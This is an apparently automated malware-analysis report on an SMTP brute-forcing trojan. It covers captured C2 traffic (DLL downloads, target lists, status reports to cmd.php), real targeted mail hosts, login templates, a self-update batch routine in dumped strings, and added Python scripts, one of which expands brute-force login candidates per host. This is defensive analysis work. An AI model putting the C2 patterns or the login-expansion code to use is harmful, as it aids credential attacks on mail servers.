Trojan.GenericKD.2177667_453ec0c6a7

by malwarelabrobot on March 2nd, 2015 in Malware Descriptions.

Trojan.Win32.WPCracker.db (Kaspersky), Trojan.GenericKD.2177667 (B) (Emsisoft), Trojan.GenericKD.2177667 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 453ec0c6a71b8b714369862edb9cded4
SHA1: 6e9863ac6292f3d4f485ed70f2f2fe4ad80061f1
SHA256: 9549ca377130e51ad40357f58e4f7572b19626db4b46cbb17f3e6a6e0bfb455d
SSDeep: 6144:4Sto9WM19qd1z6ukdrCKppancW6QVhnCbU0rQpejH:4StqW8q1nMrCyW6ihnJ0r
Size: 282624 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2015-02-17 16:04:45
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload was identified by the automated analysis. The network capture and the dumped strings further down (the "Silent_SMTP_Bruter" marker, "AUTH LOGIN", a downloaded list of mail servers with ports 25 and 465, a list of login templates, and the "ET TROJAN FortDisco Reporting Status" IDS alert) show what the sample actually is: a distributed SMTP credential brute-forcer that fetches work units from its command-and-control server and reports status back to it.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1984
%original file name%.exe:696
%original file name%.exe:492

The Trojan injects its code into the following process(es):

%original file name%.exe:828

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\System\%original file name%.exe (1425 bytes)

The process %original file name%.exe:828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\System\libeay32.dll (7386 bytes)
%Documents and Settings%\All Users\Application Data\System\ssleay32.dll (270 bytes)

The byte counts are the sandbox's own figures and do not match what crossed the wire (the server returned ssleay32.dll with Content-Length 270336, see Traffic below), so identify the dropped files by path and by the MD5s listed under Dropped PE files rather than by size. The two DLLs are the OpenSSL libraries that the sample's Synapse networking code loads for SMTP over TLS on port 465.

Registry activity

The process %original file name%.exe:1984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 79 4E 42 BF E8 48 E4 4D 7F 6F 14 10 DB 11 65"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\System]
"%original file name%.exe" = "453ec0c6a71b8b714369862edb9cded4"

To run again at every logon of the current user, the Trojan registers its dropped copy under the autorun key (the value name is the MD5 of the original file, which also appears as the MUICache entry above):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"453ec0c6a71b8b714369862edb9cded4" = "%Documents and Settings%\All Users\Application Data\System\%original file name%.exe"

The Trojan also sets the three Internet Explorer Local intranet zone options (the checkboxes under Internet Options > Security > Local intranet > Sites):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"    (include all local intranet sites not listed in other zones)
"UNCAsIntranet" = "1"   (include all network paths, i.e. UNC paths)
"ProxyBypass" = "1"     (include all sites that bypass the proxy server)

Note that "1" is also the default state of all three options and the same values commonly appear in automated sandbox reports of unrelated software, so on their own they are weak indicators; the Run key above and the files under All Users\Application Data\System are the persistence artefacts worth hunting for.

The process %original file name%.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 F6 52 52 5F 7F 5B D6 04 4B 4E 2C DE 22 DE B0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

Dropped PE files

MD5 File path
7a94e62ad54c62ecad385fddafe04304 c:\Documents and Settings\All Users\Application Data\System\libeay32.dll
e0cd0800a00d51025968d778d0e6b2b3 c:\Documents and Settings\All Users\Application Data\System\ssleay32.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name     Virtual Address  Virtual Size  Raw Size  Entropy   Section MD5
.text    4096             10210         12288     1.50698   bbb79a13385e4227f55ecb162cf098ad
.rdata   16384            874           4096      0.942361  5100832a0812ee7823886a52bd9f9f5e
.data    20480            262144        262144    4.88166   11e88bae124b9c1f246e4ae06b627088

A 12 KB .text section with entropy 1.5 and a 256 KB .data section holding almost the whole file is not the layout of an ordinary Visual C++ build, and the contradictory PEiD matches (Visual C, Armadillo, UPolyX) reflect that. The strings dumped from process 828 below come from a Delphi binary (Synapse networking units, .itext and .didata sections) that is not present in the on-disk image, so the file most likely acts as a loader that decodes the real SMTP bruter from .data and injects it into its child (the injection into %original file name%.exe:828 noted under Process activity).

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

The first eight URLs are the command-and-control server, reached both by IP and by host name. The mail hosts that follow are brute-force targets taken from the downloaded target list (see /temp_brut/42883.txt under Traffic), where each is listed with port 25 or 465.

URL IP
hxxp://178.63.29.34/ssl/ssleay32.dll
hxxp://178.63.29.34/temp_brut/42883.txt
hxxp://178.63.29.34/login.txt
hxxp://178.63.29.34/cmd.php
hxxp://maydayflower.od.ua/login.txt
hxxp://maydayflower.od.ua/temp_brut/42883.txt
hxxp://maydayflower.od.ua/ssl/ssleay32.dll
hxxp://maydayflower.od.ua/cmd.php
mail.hotnewhiphopmusic.net 173.203.187.14
mail.adammurciano.net 69.57.4.3
topshelforthopaedics.net 69.50.1.18
depressioncause.net 31.22.4.72
fukugyoh.net 203.189.105.167
smtp.ejctrans.net 163.177.65.157
jrmackenzie.net 192.185.98.226
lonnietimmonsiii.net 50.87.150.232
music2010.net 210.188.201.134
smtp.amallia.net 213.245.2.3
smtp.wyattfilms.net 66.175.58.40
infocopia.net 84.246.231.3
ozcanlarotomotiv.net 108.167.182.83
visible-horizons.net 66.96.163.137
medhorn.net 74.220.219.79
smtp.enogastrofonia.net 62.149.128.203
mail.vltict.net 91.208.80.44
smtp.gvdk.net 64.29.151.235
ikashika.net 210.140.19.229
powerclubgym.net 173.254.32.93


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN FortDisco Reporting Status

Traffic

GET /temp_brut/42883.txt HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)


HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:42 GMT
Content-Type: text/plain
Content-Length: 118726
Connection: keep-alive
Last-Modified: Sun, 01 Mar 2015 16:41:38 GMT
ETag: "4e6025d-1cfc6-5103cc681ce4d"
Accept-Ranges: bytes
Vary: Accept-Encoding
smtp.eatatmyplace.net:465..ismerkedes.net:465..mail.the-real-bunker-co
mpany.net:25..coloradoconcerts.net:25..beatboxtutorial.net:25..mail.re
albunkercompany.net:25..mail.therealbunkercompany.net:25..depressionca
use.net:465..abrasileirinha.net:25..exao.net:465..candidconcepts.net:4
65..m-kaitori.net:465..ejaculationproblems.net:465..smtp.private-job.n
et:25..m7g7.net:465..ozonedevelopment.net:465..smtp.amallia.net:25..da
ilypaypros.net:465..smtp.pointeclair.net:465..mail.iuvat.net:465..mail
.mirandaenunes.net:25..mail.benjaminsebastian.net:465..kazcutzhairdres
sing.net:465..acimac.net:465..smtp.wallpaperhangers.net:25..smtp.wyatt
films.net:465..longaeva.net:25..smtp.dinovia.net:465..smtp.victorystor
es.net:25..mail.sanjosecolocationfast.net:25..tipacti.net:465..saveoma
tic.net:465..mtleone.net:465..smtp.talent-sportif.net:465..smtp.nycarp
etcleaning.net:465..bagcomputer.net:465..tomkitzmiller.net:25..radiosa
j.net:25..gewoonbijzonder.net:465..foxyevents.net:465..internetonlinem
arketing.net:465..theheartlandnews.net:25..torihachi-chaya.net:25..cya
nimal.net:465..curiousbrain.net:465..nounonline.net:465..nanbu-utagoe.
net:25..iqdomain.net:25..de10.net:25..merrylandswest.net:25..fofans.ne
t:465..mb-works.net:25..mail.vltict.net:25..powerclubgym.net:465..smtp
.mangakoaching.net:465..smtp.designdecollection.net:465..ishiihidetake
.net:465..contramao.net:25..smtp.scurdeniser.net:465..volesworld.net:4
65..asianrealitypass.net:25..smtp.ciaobellabag.net:465..mystrength.net
:465..travelprizes.net:25..smtp.lampenkatalog.net:465..mail.bonoui

<<< skipped >>>

GET /ssl/ssleay32.dll HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)


HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:40 GMT
Content-Type: application/x-msdos-program
Content-Length: 270336
Connection: keep-alive
Last-Modified: Tue, 16 Dec 2014 03:45:50 GMT
ETag: "4e6007b-42000-50a4d31ee1780"
Accept-Ranges: bytes
[binary response body: a 270336-byte Win32 PE image (MZ/PE headers, "This program cannot be run in DOS mode", Rich header, .text/.rdata/.data sections); hex dump omitted]

<<< skipped >>>

GET /login.txt HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)


HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:43 GMT
Content-Type: text/plain
Content-Length: 134
Connection: keep-alive
Last-Modified: Fri, 06 Feb 2015 12:23:54 GMT
ETag: "4e40faf-86-50e6a7e787c9d"
Accept-Ranges: bytes
Vary: Accept-Encoding
info@{domaincut}.{zone}..test@{domaincut}.{zone}..admin@{domaincut}.{z
one}..{domaincut}@{domaincut}.{zone}..123cad..admin..auditicia....
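
The two text files above are the bruter's work unit: a list of mail servers with ports (25 for plain SMTP, 465 for SMTP over TLS, which is why the sample fetches the OpenSSL DLLs) and a list of login candidates with {domaincut} and {zone} placeholders. The page renders non-printable bytes as ".", so the ".." between entries is CRLF; the 134-byte Content-Length of /login.txt is exactly its seven lines CRLF-terminated. The following Python is an added example, not the sample's own code: it parses both files and expands the templates for each target. How the bot derives {domaincut} and {zone} from a host name is not visible on the page, so the rule used here (drop a leading smtp. or mail., then take the last two labels) is an assumption, as is treating 123cad, admin and auditicia as literal login candidates. The target sample is constructed from the first captured entries plus one malformed line.

```python
"""Expand the work unit this bruter fetches from its C2.

Added example for this report, not the sample's own code.  The capture renders
non-printable bytes as ".", so the ".." between entries is CRLF: /login.txt has
Content-Length 134, which is exactly its seven lines CRLF-terminated.  How the bot
maps a host name to {domaincut} and {zone} is not visible on the page; the rule
used here (drop a leading smtp./mail., then take the last two labels) is an
assumption, as is treating 123cad/admin/auditicia as plain login candidates.
"""
from typing import Dict, List, Tuple

# Constructed from the first entries of the captured /temp_brut/42883.txt,
# plus one malformed line to exercise the skip path.
SAMPLE_TARGETS = (
    "smtp.eatatmyplace.net:465\r\n"
    "ismerkedes.net:465\r\n"
    "mail.the-real-bunker-company.net:25\r\n"
    "depressioncause.net:465\r\n"
    "no-port-here\r\n"
)

# The captured /login.txt, reconstructed byte for byte (134 bytes).
SAMPLE_LOGINS = (
    "info@{domaincut}.{zone}\r\n"
    "test@{domaincut}.{zone}\r\n"
    "admin@{domaincut}.{zone}\r\n"
    "{domaincut}@{domaincut}.{zone}\r\n"
    "123cad\r\n"
    "admin\r\n"
    "auditicia\r\n"
)

MAIL_HOST_PREFIXES = ("smtp.", "mail.")   # assumption: stripped before deriving {domaincut}


def lines_of(blob: str) -> List[str]:
    """CRLF-delimited list, blank lines dropped."""
    return [ln.strip() for ln in blob.replace("\r\n", "\n").split("\n") if ln.strip()]


def parse_targets(blob: str) -> List[Tuple[str, int]]:
    """host:port per line; malformed lines are skipped rather than aborting the unit."""
    targets = []
    for line in lines_of(blob):
        host, sep, port = line.rpartition(":")
        if not sep or not port.isdigit():
            continue
        targets.append((host.lower(), int(port)))
    return targets


def domain_parts(host: str) -> Tuple[str, str]:
    """smtp.eatatmyplace.net -> ('eatatmyplace', 'net')  (assumed derivation rule)."""
    name = host.lower()
    for prefix in MAIL_HOST_PREFIXES:
        if name.startswith(prefix):
            name = name[len(prefix):]
            break
    labels = name.split(".")
    if len(labels) < 2:
        return name, ""
    return labels[-2], labels[-1]


def expand_logins(host: str, templates: List[str]) -> List[str]:
    """Substitute the two placeholders; entries without placeholders pass through."""
    cut, zone = domain_parts(host)
    return [t.replace("{domaincut}", cut).replace("{zone}", zone) for t in templates]


def build_work_unit(targets_blob: str, logins_blob: str) -> List[Dict]:
    """One record per target: where to connect, whether port 465 (implicit TLS,
    hence the OpenSSL DLLs the sample downloads) is used, and the logins to try."""
    templates = lines_of(logins_blob)
    return [
        {"host": host, "port": port, "implicit_tls": port == 465,
         "logins": expand_logins(host, templates)}
        for host, port in parse_targets(targets_blob)
    ]


if __name__ == "__main__":
    for unit in build_work_unit(SAMPLE_TARGETS, SAMPLE_LOGINS):
        print(f"{unit['host']}:{unit['port']} tls={unit['implicit_tls']}")
        for login in unit["logins"]:
            print("   ", login)
```

The same parser handles the full 118726-byte list the sample downloaded (Content-Length above). For a defender whose mail server appears in such a list, the expanded addresses per host are the usernames to look for in SMTP authentication-failure logs.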


POST /cmd.php HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

status=1
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:43 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14 deb7u12
Vary: Accept-Encoding
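
The IDS verdict above keys on the status report. The following Python is an added example, not the Emerging Threats rule and not the sample's code: it parses raw HTTP requests like the four captured here and scores them against the C2 protocol visible in this report, namely the Synapse default User-Agent, a GET of a numbered /temp_brut/ work unit, a GET of /login.txt or of the OpenSSL DLLs under /ssl/, and a POST to /cmd.php carrying a status= form body. The checkres.php and bruteres.php paths come from the dumped strings rather than the capture. The sample requests are constructed, and the verdict rule (default Synapse UA plus at least one protocol-specific indicator, to avoid alerting on every benign Delphi/Synapse application) is my own.

```python
"""Score HTTP requests against the C2 protocol seen in this report.

Added example (not the ET rule and not the sample's own code).  The request
samples are constructed; the verdict rule (default Synapse UA plus at least one
protocol-specific indicator) is an assumption chosen to avoid alerting on every
benign Delphi/Synapse application.
"""
import re
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

SYNAPSE_UA = "Mozilla/4.0 (compatible; Synapse)"             # Synapse library default UA
C2_PATHS = {"/cmd.php", "/checkres.php", "/bruteres.php", "/login.txt"}  # capture + strings
WORK_UNIT = re.compile(r"^/temp_brut/\d+\.txt$")              # e.g. GET /temp_brut/42883.txt
SSL_DLL = re.compile(r"^/ssl/(libeay32|ssleay32)\.dll$")       # OpenSSL DLL side-load


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: Dict[str, str]
    body: str


def parse_request(raw: str) -> HttpRequest:
    """Split a raw request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return HttpRequest(method.upper(), target, headers, body)


def indicators(req: HttpRequest) -> List[str]:
    """Names of every indicator the request matches, weakest first."""
    hits: List[str] = []
    if req.headers.get("user-agent") == SYNAPSE_UA:
        hits.append("synapse-default-ua")            # weak: shared by all Synapse apps
    path = urlsplit(req.target).path
    if WORK_UNIT.match(path):
        hits.append("work-unit-fetch")
    if SSL_DLL.match(path):
        hits.append("openssl-dll-fetch")
    if path in C2_PATHS:
        hits.append("c2-path")
    if req.method == "POST" and path == "/cmd.php" and "status" in parse_qs(req.body):
        hits.append("status-report")                 # the "Reporting Status" exchange
    return hits


def verdict(req: HttpRequest) -> str:
    """'alert' needs the Synapse UA plus a protocol indicator; either alone is 'review'."""
    hits = indicators(req)
    strong = [h for h in hits if h != "synapse-default-ua"]
    if strong and "synapse-default-ua" in hits:
        return "alert"
    return "review" if hits else "clean"


# Constructed requests: the first two mirror the captured C2 exchange, the third
# is a Synapse application fetching an ordinary page, the fourth and fifth are a
# browser hitting an unrelated site and a browser hitting a /cmd.php path.
SAMPLE_REQUESTS = [
    "POST /cmd.php HTTP/1.0\r\nHost: maydayflower.od.ua\r\nUser-Agent: " + SYNAPSE_UA
    + "\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 8\r\n\r\nstatus=1",
    "GET /temp_brut/42883.txt HTTP/1.0\r\nHost: maydayflower.od.ua\r\nUser-Agent: " + SYNAPSE_UA + "\r\n\r\n",
    "GET /index.html HTTP/1.0\r\nHost: intranet.example\r\nUser-Agent: " + SYNAPSE_UA + "\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: www.example\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/36.0\r\n\r\n",
    "GET /cmd.php?x=1 HTTP/1.1\r\nHost: www.example\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/36.0\r\n\r\n",
]


def scan(raw_requests: List[str]) -> List[str]:
    """Verdict per raw request, in input order."""
    return [verdict(parse_request(r)) for r in raw_requests]


if __name__ == "__main__":
    for raw, result in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(result, raw.split("\r\n", 1)[0])
```

The Synapse User-Agent is deliberately kept as a weak indicator: it is the library default and shows up in legitimate Delphi tooling, so a rule that fires on it alone will page you for backup agents and update checkers. Combined with the numbered /temp_brut/ fetch or the status= POST it is specific to this family's check-in.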


Strings from dumps (memory of the injected child process):

%original file name%.exe_828:

.text
`.itext
`.data
.idata
.didata
.rdata
@.rsrc
TArray<System.Byte>
TArray<System.Char>
System.Types
!"#$%&'(!)* ,-./0'
System.SysUtils
ENoMonitorSupportException
TFormatSettings.TEraInfo
System.SysUtilst-A
TArray<System.string>
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Uh.cA
&TArray<System.SysUtils.TUnitHashEntry>
iMaxUdpDg
sin_port
sin6_port
0.0.0.0
127.0.0.1
255.255.255.255
getservbyport
THookVerifyCert
LT_SSHv2
Port
ResolvePort
GetLocalSinPort
GetRemoteSinPort
FSocksPort
FSocksPassword
FSocksResponsePort
FSocksLocalPort
FSocksRemotePort
FBypassFlag
SocksPort
SocksPassword
FHTTPTunnelIP
FHTTPTunnelPort
FHTTPTunnel
FHTTPTunnelRemoteIP
FHTTPTunnelRemotePort
FHTTPTunnelUser
FHTTPTunnelPass
FHTTPTunnelTimeout
TTCPBlockSocket&
TTCPBlockSocket
HTTPTunnelIP
HTTPTunnelPort
HTTPTunnelUser
HTTPTunnelPass
HTTPTunnelTimeout
HTTPTunnelTOB
FOnVerifyCert
FKeyPassword
FCertificateFile
FPrivateKeyFile
FCertificate
FPrivateKey
FCertCA
FCertCAFile
FTrustCertificate
FTrustCertificateFile
FVerifyCert
FPassword
FSSHChannelType
FSSHChannelArg1
FSSHChannelArg2
FCertComplianceLevel
GetCertInfo
GetVerifyCert
KeyPassword
Password
CertificateFile
PrivateKeyFile(
Certificate(
PrivateKey(
TrustCertificateFile(
TrustCertificate(
CertCA
CertCAFile
VerifyCert
SSHChannelType
SSHChannelArg1
SSHChannelArg2
CertComplianceLevel
OnVerifyCert
FTargetPort
TargetPort
httpsendex
FAlivePort
FProxyPort
FProxyPass
FAddPortNumberToHost
THTTPSend,
HTTPMethod
THTTPSend
ProxyPort
ProxyPass
AddPortNumberToHost
FESMTPcap
FESMTP
FESMTPSize
TSMTPSend&
Login
TSMTPSend
smtpsendex
ESMTPcap
ESMTP
ESMTPSize
AUTH LOGIN
FSMTPSend
FHTTP
FCmdEvent
FLastCmdDate
FLastCmdDateCS
FCmdParams
TCmdGet?
TCmdGet
cmdget
LastCmdDate
Winapi.Windows
System.UITypes
System.RTLConsts
System.SysConst
System.Internal.ExcUtils
System.Character
Winapi.PsAPI
Winapi.SHFolder
Winapi.ImageHlp
System.StrUtils
Winapi.ShellAPI
Winapi.IpExport
Winapi.Winsock2
Winapi.Qos
Winapi.Messages
Winapi.WinSock
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
kernel32.dll
GetCPInfo
shell32.dll
ShellExecuteW
SHFolder.dll
Silent_SMTP_Bruter
dSystem.SysConst
ISystem.Internal.ExcUtils
,System.Character
kWinapi.PsAPI
-Winapi.ImageHlp
System.StrUtils
"Winapi.WinSock
HTTPS
%d.%d.%d.%d
ws2_32.dll
owship6.dll
Synapse TCP/IP Socket error %d: %s
Operation would block
Operation now in progress
Operation already in progress
Socket operation on nonsocket
Protocol not supported
Socket not supported
Operation not supported on Socket
Protocol family not supported
Address family not supported
Winsock DLL cannot support this application
0.0.0.1
HTTP/1.0
HTTP/
SSL/TLS support is not compiled!
Without SSL support
Mozilla/4.0 (compatible; Synapse)
HTTP/
LOGIN
ssleay32.dll
libssl32.dll
libeay32.dll
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_check_private_key
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_get_peer_certificate
X509_set_pubkey
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_assign
RSA_generate_key
i2d_PrivateKey_bio
DES_set_key_checked
smtp.­dr%
application/x-www-form-urlencoded
smtp.
{login}
{loginfull}
cmd.php
checkres.php
bruteres.php
login.txt
status=%s
ssl/libeay32.dll
ssl/ssleay32.dll
upd.tmp
upd.bat
set fl="%s"
del /q %%fl%%
if exist %%fl%% goto dl
move /y "%s" %%fl%%
start "" %%fl%%
Error loading Socket interface (ws2_32.dll)!
Advapi32.dll

%original file name%.exe_828_rwx_00400000_00049000:

(identical to the string set listed for %original file name%.exe_828 above; this RWX region at 0x00400000 is the injected image itself)


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1984
    %original file name%.exe:696
    %original file name%.exe:492

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\All Users\Application Data\System\%original file name%.exe (1425 bytes)
    %Documents and Settings%\All Users\Application Data\System\libeay32.dll (7386 bytes)
    %Documents and Settings%\All Users\Application Data\System\ssleay32.dll (270 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "453ec0c6a71b8b714369862edb9cded4" = "%Documents and Settings%\All Users\Application Data\System\%original file name%.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
